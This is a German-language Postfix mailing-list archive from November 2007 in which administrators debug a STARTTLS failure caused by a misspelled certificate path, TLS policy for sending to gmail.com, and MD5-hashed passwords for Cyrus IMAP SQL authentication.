nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From cite at incertum.net Thu Nov 8 11:53:54 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Thu, 8 Nov 2007 11:53:54 +0100 Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> <20071108075329.GB3849@state-of-mind.de> <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> Message-ID: <20071108105354.GG9494@mail.incertum.net> * brunhilde at siebenwind.de wrote: > folgendes kam bei der Telnet Session heraus: > > 220 mx-mailer.domain.tld ESMTP (Banner v2.0) > 250-mx-mailer.domain.tld > 250-PIPELINING > 250-SIZE 30480000 > 250-VRFY > 250-ETRN > 250-STARTTLS > 250-AUTH DIGEST-MD5 CRAM-MD5 LOGIN PLAIN > 250-AUTH=DIGEST-MD5 CRAM-MD5 LOGIN PLAIN > 250-ENHANCEDSTATUSCODES > 250-8BITMIME > 250 DSN Das sieht ja soweit gut aus - na ja, AUTH PLAIN über eine ungesicherte Verbindung ist nicht so toll (evt. mal smtpd_tls_auth_only = yes setzen), hat aber mit dem Problem nichts zu tun. Was sagt er, wenn Du versuchst, STARTTLS zu benutzen? Also z.B. via: openssl s_client -starttls smtp -connect :25 oder, falls Du "swaks" hast (das benutze ich sehr gerne zum testen): swaks -tls -auth -au -f -t -s Falls es da Fehler gibt, denk' bitte dran, auch das Log zu posten. Und der Vollständigkeit halber dann bitte auch die Ausgabe von "postconf -n". Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 25 Zeichen, daß Du erwachsen bist, Nummer 21: Du isst Brot und trinkst Kaffee zum Frühstück, nicht mehr Spiegeleier und Bier. From postfixbuch-users at japantest.homelinux.com Thu Nov 8 12:17:23 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Thu, 08 Nov 2007 12:17:23 +0100 Subject: [Postfixbuch-users] smtp_sender_dependent_* + gmail In-Reply-To: <200711080921.05459.kildau-ml@gmx.de> References: <200711071104.37894.kildau-ml@gmx.de> <200711071649.22915.kildau-ml@gmx.de> <4732251F.5030509@japantest.homelinux.com> <200711080921.05459.kildau-ml@gmx.de> Message-ID: <4732F043.3080703@japantest.homelinux.com> Chris Cohen wrote: > On Wednesday 07 November 2007 21:50:39 Sandy Drobic wrote: >> [...] >> Neuere sollten hiermit dazu gezwungen werden, STARTTLS zu verwenden: >> >> smtp_tls_policy_maps = hash:/etc/postfix/tls_policy >> >> /etc/postfix/tls_policy: >> gmail.com encrypt >> >> Das sollte Postfix dazu zwingen, alle Verbindungen nach gmail.com nur >> verschlüsselt aufzubauen. Voraussetzung ist natürlich, dass Postfix in er >> Lage ist, eine verschlüsstelte Verbindung aufzubauen. Du kannst ja mal >> überprüfen, ob der smtp-client mit openssl gelinkt ist. >> >> ldd /path/to/postfix/smtp | grep ssl >> >> ldd /usr/lib/postfix/smtp | grep ssl >> libssl.so.0.9.8 => /usr/lib/libssl.so.0.9.8 (0xb7e70000) > > Viele viele Fehlermeldungen und Zertifikategenerierungen später... > es funktioniert :) > Ich glaub, ich muss mich dann bei Gelegenheit mal in OpenSSL und Zertifikate > generell einlesen... Sehr schön, obwohl für das SENDEN keine Zertifikate erforderlich sind. Das funktioniert out-of-the-box, wenn Postfix mit Openssl-Unterstützung kompiliert ist (eigentlich immer). -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From mrg at unimx.de Thu Nov 8 12:10:45 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 8 Nov 2007 12:10:45 +0100 Subject: [Postfixbuch-users] Cyrus-Imap Login via Mysql MD5 (Hash) Message-ID: <008901c821f8$02d5c830$08815890$@de> Hallo Liste, habe entsprechend des Buches mein Auth im Cyrus-Imap konfiguriert. Nutze das Plugin Sql für die Authentifizierung sasl_pwcheck_method: auxprop sasl_auxprop_plugin: sql SELECT pass FROM `smtpauth` WHERE user=?user1? Klappt soweit auch ganz gut, nur will ich die Passwörter md5 verschlüsselt in der Datenbank haben. Wie teile ich dem Systme nun mit, dass die Passwörter MD5 (Hash) in der Datenbank sind. Passwort in der Datenbank: 3102125cae72c19f215480ddf2d0d5c3 Gebe ich nun als Klartextpasswort im Mailclient ein ?mypassswd? schlägt die Auth fehl: message.log Nov 8 03:03:10 inetmx imap[20302]: sql auxprop plugin using mysql engine Nov 8 03:03:10 inetmx imap[20302]: accepted connection Nov 8 03:03:10 inetmx imap[20302]: DIGEST-MD5 server step 1 Nov 8 03:03:10 inetmx imap[20302]: DIGEST-MD5 server step 2 Nov 8 03:03:10 inetmx imap[20302]: realm changed: authentication aborted Nov 8 03:03:10 inetmx imap[20302]: badlogin: HOST [nn.nn.nn.nn] DIGEST-MD5 [SASL(-13): authentication failure: realm changed: authentication aborted] Nov 8 03:03:13 inetmx imap[20302]: sql plugin Parse the username user1 Nov 8 03:03:13 inetmx imap[20302]: sql plugin try and connect to a host Nov 8 03:03:13 inetmx imap[20302]: sql plugin trying to open db 'mailsetting' on host 'host.de' Nov 8 03:03:13 inetmx imap[20302]: sql plugin Parse the username user1 Nov 8 03:03:13 inetmx imap[20302]: sql plugin try and connect to a host Nov 8 03:03:13 inetmx imap[20302]: sql plugin trying to open db 'mailsetting' on host 'host.de' Nov 8 03:03:13 inetmx imap[20302]: sql plugin Parse the username user1 Nov 8 03:03:13 inetmx imap[20302]: sql plugin try and connect to a host Nov 8 03:03:13 inetmx imap[20302]: sql plugin trying to open db 'mailsetting' on host 'host.de' Nov 8 03:03:13 inetmx imap[20302]: begin transaction Nov 8 03:03:13 inetmx imap[20302]: sql plugin create statement from userPassword user nnnnn Nov 8 03:03:13 inetmx imap[20302]: sql plugin doing query SELECT pass FROM smtpauth WHERE user = 'user1'; Nov 8 03:03:13 inetmx imap[20302]: sql plugin create statement from cmusaslsecretPLAIN user1 nnnnn Nov 8 03:03:13 inetmx imap[20302]: sql plugin doing query SELECT pass FROM smtpauth WHERE user = 'user1'; Nov 8 03:03:13 inetmx imap[20302]: commit transaction Nov 8 03:03:13 inetmx imap[20302]: sql plugin Parse the username user1 Nov 8 03:03:13 inetmx imap[20302]: sql plugin try and connect to a host Nov 8 03:03:13 inetmx imap[20302]: sql plugin trying to open db 'mailsetting' on host 'host.de' Nov 8 03:03:13 inetmx imap[20302]: badlogin: HOST [nn.nn.nn.nn] plaintext user1 SASL(-13): authentication failure: checkpass failed Gebe ich aber 3102125cae72c19f215480ddf2d0d5c3 ein geht alles gut. Ist ja logisch. Wie kann ich das Plugin anweisen das Passwort was vom Client kommt mittels MD5 umzuwandeln? Hinweis: Ich muss die Passwörter nicht zwingend md5 verschlüsselt speichern, anders verschlüsselt in die DB geht auch. Klartextpasswörter in der DB sind keine Option. Nutze cyrus-sasl 2.1.21 cyrus-sasl-sqlauxprop 2.1.21 (ist das Plugin für SQL) cyrus-imap 2.2.12 Danke für eure Hilfe. Bin sehr ratlos. Martin -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From brunhilde at siebenwind.de Thu Nov 8 12:39:57 2007 From: brunhilde at siebenwind.de (BrunIGunde) Date: Thu, 8 Nov 2007 12:39:57 +0100 (CET) Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <20071108105354.GG9494@mail.incertum.net> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> <20071108075329.GB3849@state-of-mind.de> <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> <20071108105354.GG9494@mail.incertum.net> Message-ID: <3912.79.214.195.187.1194521997.squirrel@mail.siebenwind.de> > Das sieht ja soweit gut aus - na ja, AUTH PLAIN über eine ungesicherte > Verbindung ist nicht so toll (evt. mal smtpd_tls_auth_only = yes > setzen), hat aber mit dem Problem nichts zu tun. > > Was sagt er, wenn Du versuchst, STARTTLS zu benutzen? Also z.B. via: > > openssl s_client -starttls smtp -connect :25 > > oder, falls Du "swaks" hast (das benutze ich sehr gerne zum testen): > > swaks -tls -auth -au -f -t -s > > Falls es da Fehler gibt, denk' bitte dran, auch das Log zu posten. Und > der Vollständigkeit halber dann bitte auch die Ausgabe von "postconf -n". > > > Ciao > Stefan Hi, Linus-H1:~/ca# openssl s_client -starttls smtp -connect mail.domain.tld:25 CONNECTED(00000003) 26506:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol:s23_clnt.c:567: Ich finde in keiner logfile etwas dazu. Dann der swaks Test: === Trying mail.wvbrb.de:25... === Connected to mail.wvbrb.de. <- 220 mx-mailer.domain.tld ESMTP (Mailsystem v2.0) -> EHLO localhost <- 250-mx-mailer.domain.tld <- 250-PIPELINING <- 250-SIZE 30480000 <- 250-VRFY <- 250-ETRN <- 250-STARTTLS <- 250-AUTH DIGEST-MD5 CRAM-MD5 LOGIN PLAIN <- 250-AUTH=DIGEST-MD5 CRAM-MD5 LOGIN PLAIN <- 250-ENHANCEDSTATUSCODES <- 250-8BITMIME <- 250 DSN -> STARTTLS <** 454 4.3.0 TLS not available due to local problem -> QUIT <- 221 2.0.0 Bye === Connection closed with remote host. Dazu fand sich dann etwas in der Log, der Pfad zum Zertifikat ist aber richtig.: Nov 8 12:26:45 localhost postfix/smtpd[30206]: warning: TLS library problem: 30206:error:02001002:system library:fopen:No such file or directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): Nov 8 12:26:45 localhost postfix/smtpd[30206]: warning: TLS library problem: 30206:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:125: Nov 8 12:26:45 localhost postfix/smtpd[30206]: warning: TLS library problem: 30206:error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system lib:by_file.c:274: Nov 8 12:26:45 localhost postfix/smtpd[30207]: warning: TLS library problem: 30207:error:02001002:system library:fopen:No such file or directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): Nov 8 12:26:45 localhost postfix/smtpd[30207]: warning: TLS library problem: 30207:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:125: Nov 8 12:26:45 localhost postfix/smtpd[30207]: warning: TLS library problem: 30207:error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system lib:by_file.c:274: Nov 8 12:27:09 localhost postfix/smtpd[30247]: warning: TLS library problem: 30247:error:02001002:system library:fopen:No such file or directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): Nov 8 12:27:09 localhost postfix/smtpd[30247]: warning: TLS library problem: 30247:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:125: Nov 8 12:27:09 localhost postfix/smtpd[30247]: warning: TLS library problem: 30247:error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system lib:by_file.c:274: Nov 8 12:27:09 localhost postfix/smtpd[30248]: warning: TLS library problem: 30248:error:02001002:system library:fopen:No such file or directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): Nov 8 12:27:09 localhost postfix/smtpd[30248]: warning: TLS library problem: 30248:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:125: Nov 8 12:27:09 localhost postfix/smtpd[30248]: warning: TLS library problem: 30248:error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system lib:by_file.c:274: Nov 8 12:28:27 localhost postfix/smtpd[30405]: warning: TLS library problem: 30405:error:02001002:system library:fopen:No such file or directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): Nov 8 12:28:27 localhost postfix/smtpd[30405]: warning: TLS library problem: 30405:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:125: Nov 8 12:28:27 localhost postfix/smtpd[30405]: warning: TLS library problem: 30405:error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system lib:by_file.c:274: Nov 8 12:28:27 localhost postfix/smtpd[30406]: warning: TLS library problem: 30406:error:02001002:system library:fopen:No such file or directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): Nov 8 12:28:27 localhost postfix/smtpd[30406]: warning: TLS library problem: 30406:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:125: Nov 8 12:28:27 localhost postfix/smtpd[30406]: warning: TLS library problem: 30406:error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system lib:by_file.c:274: Nov 8 12:28:27 localhost postfix/smtpd[30407]: warning: TLS library problem: 30407:error:02001002:system library:fopen:No such file or directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): Nov 8 12:28:27 localhost postfix/smtpd[30407]: warning: TLS library problem: 30407:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:125: Nov 8 12:28:27 localhost postfix/smtpd[30407]: warning: TLS library problem: 30407:error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system lib:by_file.c:274: Nov 8 12:28:30 localhost postfix/smtpd[30409]: warning: TLS library problem: 30409:error:02001002:system library:fopen:No such file or directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): Nov 8 12:28:30 localhost postfix/smtpd[30409]: warning: TLS library problem: 30409:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:125: Nov 8 12:28:30 localhost postfix/smtpd[30409]: warning: TLS library problem: 30409:error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system lib:by_file.c:274: Nov 8 12:30:21 localhost postfix/smtpd[30613]: warning: TLS library problem: 30613:error:02001002:system library:fopen:No such file or directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): Nov 8 12:30:21 localhost postfix/smtpd[30613]: warning: TLS library problem: 30613:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:125: Nov 8 12:30:21 localhost postfix/smtpd[30613]: warning: TLS library problem: 30613:error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system lib:by_file.c:274: Nov 8 12:30:23 localhost postfix/smtpd[30617]: warning: TLS library problem: 30617:error:02001002:system library:fopen:No such file or directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): Nov 8 12:30:23 localhost postfix/smtpd[30617]: warning: TLS library problem: 30617:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:125: Nov 8 12:30:23 localhost postfix/smtpd[30617]: warning: TLS library problem: 30617:error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system lib:by_file.c:274: Und zuletzt dann noch die Postfix Conf: alias_database = hash:/etc/aliases alias_maps = $alias_database append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes command_directory = /usr/sbin config_directory = /etc/postfix daemon_directory = /usr/lib/postfix header_checks = regexp:/etc/postfix/maps/header_checks inet_interfaces = all mailbox_command = procmail -a "$EXTENSION" mailbox_size_limit = 0 message_size_limit = 30480000 mydestination = $myhostname $mydomain localhost localhost.$mydomain mydomain = mx-mailer.domain.tld myhostname = mx-mailer.domain.tld mynetworks = 127.0.0.0/8, 192.168.1.0/24 myorigin = $mydomain recipient_delimiter = + relay_domains = mx-mailer.domain.tld remote_header_rewrite_domain = mx-mailer.domain.tld smtp_tls_CAfile = /etc/postfix/ssl/smtpd.pem smtp_tls_cert_file = /etc/postfix/ssl/mail.crt smtp_tls_key_file = /etc/postfix/ssl/mail.key smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache smtp_use_tls = yes smtpd_banner = $myhostname ESMTP (Mailsystem v2.0) smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_unauth_destination, reject_invalid_hostname, reject_non_fqdn_recipient, reject_non_fqdn_sender, reject_unauth_pipelining, reject_rhsbl_sender blackhole.securitysage.com, reject_rhsbl_client blackhole.securitysage.com, reject_rbl_client blackholes.easynet.nl, reject_rbl_client sbl-xbl.spamhaus.org smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = $myhostname smtpd_sasl_security_options = noanonymous smtpd_tls_CAfile = /etc/postifx/ssl/smtpd.pem smtpd_tls_cert_file = /etc/postfix/ssl/mail.crt smtpd_tls_key_file = /etc/postfix/ssl/mail.key smtpd_tls_loglevel = 2 smtpd_tls_session_cache_timeout = 3600s smtpd_use_tls = yes tls_random_source = dev:/dev/urandom virtual_alias_domains = virtual_alias_maps = mysql:/etc/postfix/mysql-virtual_alias_maps.cf virtual_gid_maps = mysql:/etc/postfix/mysql-virtual_gid_maps.cf virtual_mailbox_base = /var/kunden/mail/ virtual_mailbox_domains = mysql:/etc/postfix/mysql-virtual_mailbox_domains.cf virtual_mailbox_limit = 51200000 virtual_mailbox_maps = mysql:/etc/postfix/mysql-virtual_mailbox_maps.cf virtual_transport = maildrop virtual_uid_maps = mysql:/etc/postfix/mysql-virtual_uid_maps.cf From kildau-ml at gmx.de Thu Nov 8 12:49:57 2007 From: kildau-ml at gmx.de (Chris Cohen) Date: Thu, 8 Nov 2007 12:49:57 +0100 Subject: [Postfixbuch-users] smtp_sender_dependent_* + gmail In-Reply-To: <4732F043.3080703@japantest.homelinux.com> References: <200711071104.37894.kildau-ml@gmx.de> <200711080921.05459.kildau-ml@gmx.de> <4732F043.3080703@japantest.homelinux.com> Message-ID: <200711081249.58033.kildau-ml@gmx.de> On Thursday 08 November 2007 12:17:23 Sandy Drobic wrote: > > > > Viele viele Fehlermeldungen und Zertifikategenerierungen später... > > es funktioniert :) > > Ich glaub, ich muss mich dann bei Gelegenheit mal in OpenSSL und > > Zertifikate generell einlesen... > > Sehr schön, obwohl für das SENDEN keine Zertifikate erforderlich sind. Das > funktioniert out-of-the-box, wenn Postfix mit Openssl-Unterstützung > kompiliert ist (eigentlich immer). > Ohne eigene Zertifikate hab' ich immer nur Nov 8 07:37:17 daisy postfix/smtp[8625]: certificate verification failed for smtp.gmail.com: num=20:unable to get local issuer certificate Nov 8 07:37:17 daisy postfix/smtp[8625]: certificate verification failed for smtp.gmail.com: num=27:certificate not trusted Nov 8 07:37:17 daisy postfix/smtp[8625]: certificate verification failed for smtp.gmail.com: num=21:unable to verify the first certificate Nov 8 07:37:17 daisy postfix/smtp[8625]: warning: SASL authentication failure: No worthy mechs found in die Logs bekommen, wobei ich mir jetzt nicht sicher bin, ob das an smtp_sasl_security_options = noanonymous oder dem fehlenden Zertifikaten lag. (Oder an beidem?) -- Greetings Chris From nospam at thoma.cc Thu Nov 8 13:05:06 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Thu, 08 Nov 2007 13:05:06 +0100 Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <3912.79.214.195.187.1194521997.squirrel@mail.siebenwind.de> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> <20071108075329.GB3849@state-of-mind.de> <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> <20071108105354.GG9494@mail.incertum.net> <3912.79.214.195.187.1194521997.squirrel@mail.siebenwind.de> Message-ID: <4732FB72.7090107@thoma.cc> BrunIGunde schrieb: >> Das sieht ja soweit gut aus - na ja, AUTH PLAIN über eine ungesicherte >> Verbindung ist nicht so toll (evt. mal smtpd_tls_auth_only = yes >> setzen), hat aber mit dem Problem nichts zu tun. >> >> Was sagt er, wenn Du versuchst, STARTTLS zu benutzen? Also z.B. via: >> >> openssl s_client -starttls smtp -connect :25 >> >> oder, falls Du "swaks" hast (das benutze ich sehr gerne zum testen): >> >> swaks -tls -auth -au -f -t -s >> >> Falls es da Fehler gibt, denk' bitte dran, auch das Log zu posten. Und >> der Vollständigkeit halber dann bitte auch die Ausgabe von "postconf -n". >> >> >> Ciao >> Stefan > > Hi, > > Linus-H1:~/ca# openssl s_client -starttls smtp -connect mail.domain.tld:25 > CONNECTED(00000003) > 26506:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown > protocol:s23_clnt.c:567: > > Ich finde in keiner logfile etwas dazu. Dann der swaks Test: > > > === Trying mail.wvbrb.de:25... > === Connected to mail.wvbrb.de. > <- 220 mx-mailer.domain.tld ESMTP (Mailsystem v2.0) > -> EHLO localhost > <- 250-mx-mailer.domain.tld > <- 250-PIPELINING > <- 250-SIZE 30480000 > <- 250-VRFY > <- 250-ETRN > <- 250-STARTTLS > <- 250-AUTH DIGEST-MD5 CRAM-MD5 LOGIN PLAIN > <- 250-AUTH=DIGEST-MD5 CRAM-MD5 LOGIN PLAIN > <- 250-ENHANCEDSTATUSCODES > <- 250-8BITMIME > <- 250 DSN > -> STARTTLS > <** 454 4.3.0 TLS not available due to local problem > -> QUIT > <- 221 2.0.0 Bye > === Connection closed with remote host. > > Dazu fand sich dann etwas in der Log, der Pfad zum Zertifikat ist aber > richtig.: > > Nov 8 12:26:45 localhost postfix/smtpd[30206]: warning: TLS library > problem: 30206:error:02001002:system library:fopen:No such file or > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > Nov 8 12:26:45 localhost postfix/smtpd[30206]: warning: TLS library > problem: 30206:error:2006D080:BIO routines:BIO_new_file:no such > file:bss_file.c:125: > Nov 8 12:26:45 localhost postfix/smtpd[30206]: warning: TLS library > problem: 30206:error:0B084002:x509 certificate > routines:X509_load_cert_crl_file:system lib:by_file.c:274: > Nov 8 12:26:45 localhost postfix/smtpd[30207]: warning: TLS library > problem: 30207:error:02001002:system library:fopen:No such file or > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > Nov 8 12:26:45 localhost postfix/smtpd[30207]: warning: TLS library > problem: 30207:error:2006D080:BIO routines:BIO_new_file:no such > file:bss_file.c:125: > Nov 8 12:26:45 localhost postfix/smtpd[30207]: warning: TLS library > problem: 30207:error:0B084002:x509 certificate > routines:X509_load_cert_crl_file:system lib:by_file.c:274: > Nov 8 12:27:09 localhost postfix/smtpd[30247]: warning: TLS library > problem: 30247:error:02001002:system library:fopen:No such file or > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > Nov 8 12:27:09 localhost postfix/smtpd[30247]: warning: TLS library > problem: 30247:error:2006D080:BIO routines:BIO_new_file:no such > file:bss_file.c:125: > Nov 8 12:27:09 localhost postfix/smtpd[30247]: warning: TLS library > problem: 30247:error:0B084002:x509 certificate > routines:X509_load_cert_crl_file:system lib:by_file.c:274: > Nov 8 12:27:09 localhost postfix/smtpd[30248]: warning: TLS library > problem: 30248:error:02001002:system library:fopen:No such file or > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > Nov 8 12:27:09 localhost postfix/smtpd[30248]: warning: TLS library > problem: 30248:error:2006D080:BIO routines:BIO_new_file:no such > file:bss_file.c:125: > Nov 8 12:27:09 localhost postfix/smtpd[30248]: warning: TLS library > problem: 30248:error:0B084002:x509 certificate > routines:X509_load_cert_crl_file:system lib:by_file.c:274: > Nov 8 12:28:27 localhost postfix/smtpd[30405]: warning: TLS library > problem: 30405:error:02001002:system library:fopen:No such file or > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > Nov 8 12:28:27 localhost postfix/smtpd[30405]: warning: TLS library > problem: 30405:error:2006D080:BIO routines:BIO_new_file:no such > file:bss_file.c:125: > Nov 8 12:28:27 localhost postfix/smtpd[30405]: warning: TLS library > problem: 30405:error:0B084002:x509 certificate > routines:X509_load_cert_crl_file:system lib:by_file.c:274: > Nov 8 12:28:27 localhost postfix/smtpd[30406]: warning: TLS library > problem: 30406:error:02001002:system library:fopen:No such file or > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > Nov 8 12:28:27 localhost postfix/smtpd[30406]: warning: TLS library > problem: 30406:error:2006D080:BIO routines:BIO_new_file:no such > file:bss_file.c:125: > Nov 8 12:28:27 localhost postfix/smtpd[30406]: warning: TLS library > problem: 30406:error:0B084002:x509 certificate > routines:X509_load_cert_crl_file:system lib:by_file.c:274: > Nov 8 12:28:27 localhost postfix/smtpd[30407]: warning: TLS library > problem: 30407:error:02001002:system library:fopen:No such file or > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > Nov 8 12:28:27 localhost postfix/smtpd[30407]: warning: TLS library > problem: 30407:error:2006D080:BIO routines:BIO_new_file:no such > file:bss_file.c:125: > Nov 8 12:28:27 localhost postfix/smtpd[30407]: warning: TLS library > problem: 30407:error:0B084002:x509 certificate > routines:X509_load_cert_crl_file:system lib:by_file.c:274: > Nov 8 12:28:30 localhost postfix/smtpd[30409]: warning: TLS library > problem: 30409:error:02001002:system library:fopen:No such file or > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > Nov 8 12:28:30 localhost postfix/smtpd[30409]: warning: TLS library > problem: 30409:error:2006D080:BIO routines:BIO_new_file:no such > file:bss_file.c:125: > Nov 8 12:28:30 localhost postfix/smtpd[30409]: warning: TLS library > problem: 30409:error:0B084002:x509 certificate > routines:X509_load_cert_crl_file:system lib:by_file.c:274: > Nov 8 12:30:21 localhost postfix/smtpd[30613]: warning: TLS library > problem: 30613:error:02001002:system library:fopen:No such file or > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > Nov 8 12:30:21 localhost postfix/smtpd[30613]: warning: TLS library > problem: 30613:error:2006D080:BIO routines:BIO_new_file:no such > file:bss_file.c:125: > Nov 8 12:30:21 localhost postfix/smtpd[30613]: warning: TLS library > problem: 30613:error:0B084002:x509 certificate > routines:X509_load_cert_crl_file:system lib:by_file.c:274: > Nov 8 12:30:23 localhost postfix/smtpd[30617]: warning: TLS library > problem: 30617:error:02001002:system library:fopen:No such file or > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > Nov 8 12:30:23 localhost postfix/smtpd[30617]: warning: TLS library > problem: 30617:error:2006D080:BIO routines:BIO_new_file:no such > file:bss_file.c:125: > Nov 8 12:30:23 localhost postfix/smtpd[30617]: warning: TLS library > problem: 30617:error:0B084002:x509 certificate > routines:X509_load_cert_crl_file:system lib:by_file.c:274: > > Und zuletzt dann noch die Postfix Conf: > > alias_database = hash:/etc/aliases > alias_maps = $alias_database > append_dot_mydomain = no > biff = no > broken_sasl_auth_clients = yes > command_directory = /usr/sbin > config_directory = /etc/postfix > daemon_directory = /usr/lib/postfix > header_checks = regexp:/etc/postfix/maps/header_checks > inet_interfaces = all > mailbox_command = procmail -a "$EXTENSION" > mailbox_size_limit = 0 > message_size_limit = 30480000 > mydestination = $myhostname $mydomain localhost localhost.$mydomain > mydomain = mx-mailer.domain.tld > myhostname = mx-mailer.domain.tld > mynetworks = 127.0.0.0/8, 192.168.1.0/24 > myorigin = $mydomain > recipient_delimiter = + > relay_domains = mx-mailer.domain.tld > remote_header_rewrite_domain = mx-mailer.domain.tld > smtp_tls_CAfile = /etc/postfix/ssl/smtpd.pem > smtp_tls_cert_file = /etc/postfix/ssl/mail.crt > smtp_tls_key_file = /etc/postfix/ssl/mail.key > smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache > smtp_use_tls = yes > smtpd_banner = $myhostname ESMTP (Mailsystem v2.0) > smtpd_recipient_restrictions = permit_sasl_authenticated, > permit_mynetworks, reject_unauth_destination, reject_invalid_hostname, > reject_non_fqdn_recipient, reject_non_fqdn_sender, > reject_unauth_pipelining, reject_rhsbl_sender blackhole.securitysage.com, > reject_rhsbl_client blackhole.securitysage.com, reject_rbl_client > blackholes.easynet.nl, reject_rbl_client sbl-xbl.spamhaus.org > smtpd_sasl_auth_enable = yes > smtpd_sasl_local_domain = $myhostname > smtpd_sasl_security_options = noanonymous > smtpd_tls_CAfile = /etc/postifx/ssl/smtpd.pem > smtpd_tls_cert_file = /etc/postfix/ssl/mail.crt > smtpd_tls_key_file = /etc/postfix/ssl/mail.key > smtpd_tls_loglevel = 2 > smtpd_tls_session_cache_timeout = 3600s > smtpd_use_tls = yes > tls_random_source = dev:/dev/urandom > virtual_alias_domains = > virtual_alias_maps = mysql:/etc/postfix/mysql-virtual_alias_maps.cf > virtual_gid_maps = mysql:/etc/postfix/mysql-virtual_gid_maps.cf > virtual_mailbox_base = /var/kunden/mail/ > virtual_mailbox_domains = mysql:/etc/postfix/mysql-virtual_mailbox_domains.cf > virtual_mailbox_limit = 51200000 > virtual_mailbox_maps = mysql:/etc/postfix/mysql-virtual_mailbox_maps.cf > virtual_transport = maildrop > virtual_uid_maps = mysql:/etc/postfix/mysql-virtual_uid_maps.cf > > > > > > er kann das file nicht öffnen !!! Nov 8 12:30:21 localhost postfix/smtpd[30613]: warning: TLS library problem: 30613:error:02001002:system library:fopen:No such file or directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): Existieren eigentlich die ganzen Files ??? smtpd_tls_CAfile = /etc/postifx/ssl/smtpd.pem smtpd_tls_cert_file = /etc/postfix/ssl/mail.crt smtpd_tls_key_file = /etc/postfix/ssl/mail.key und achtung linux ist case sensitive !!!! was gibt ls -la /etc/postfix/ssl aus ??? evtl. sind die zugriffsrechte nicht ausreichend !!! gruß maximilian -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From brunhilde at siebenwind.de Thu Nov 8 13:15:24 2007 From: brunhilde at siebenwind.de (BruniGunde) Date: Thu, 8 Nov 2007 13:15:24 +0100 (CET) Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <4732FB72.7090107@thoma.cc> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> <20071108075329.GB3849@state-of-mind.de> <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> <20071108105354.GG9494@mail.incertum.net> <3912.79.214.195.187.1194521997.squirrel@mail.siebenwind.de> 